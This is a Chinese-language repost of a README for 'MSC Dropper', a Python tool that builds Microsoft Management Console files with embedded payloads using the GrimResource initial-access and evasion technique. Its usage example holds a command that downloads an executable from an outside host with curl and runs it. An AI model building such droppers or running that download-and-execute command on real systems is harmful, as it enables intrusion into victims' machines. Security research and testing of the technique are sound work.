MSC Dropper 工具
MSC Dropper 是一个 Python 脚本,旨在自动创建带有可自定义有效负载的 MSC(Microsoft 管理控制台)文件,以实现任意执行。此工具利用了 Elastic Security Labs 的 Samir (@SBousseaden) 发现的一种方法,称为 #GrimResource,该方法有助于通过 进行初始访问和规避mmc.exe。
概述
该脚本允许用户生成可在 Microsoft 管理控制台环境中执行任意命令或脚本的 MSC 文件。此功能对于安全研究和测试环境特别有用。
特征
-
自动 MSC 文件生成:创建嵌入指定命令或脚本的 MSC 文件。
-
有效载荷定制:定制有效载荷以执行任何mmc.exe可以调用的命令或脚本。
-
命令行界面:简单的命令行界面,用于快速生成 MSC 文件。
安装
克隆存储库:
git clone https://github.com/ZERODETECTION/MSC_Dropper.git
用法
-
生成 MSC 文件
要使用特定命令或脚本生成 MSC 文件:
python msc_dropper.py template1.msc out.msc "cmd /c curl -O http://wslab.de/tools/messagebox.exe && messagebox.exe"
替换"cmd /c curl -O http://wslab.de/tools/messagebox.exe && messagebox.exe"为您要执行的命令或脚本。确保命令格式正确,可以在 Windows 环境中运行mmc.exe。
自定义有效载荷
您可以直接在文件中自定义有效载荷template1.msc或修改脚本以自动生成更复杂的有效载荷。
致谢
Elastic Security Labs 的 Samir (@SBousseaden) 发现了涉及的初始访问和逃避方法mmc.exe。
https://github.com/ZERODETECTION/MSC_Dropper
原文始发于微信公众号(Ots安全):自定义恶意payload 的 MSC(Microsoft 管理控制台)文件以供任意执行
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论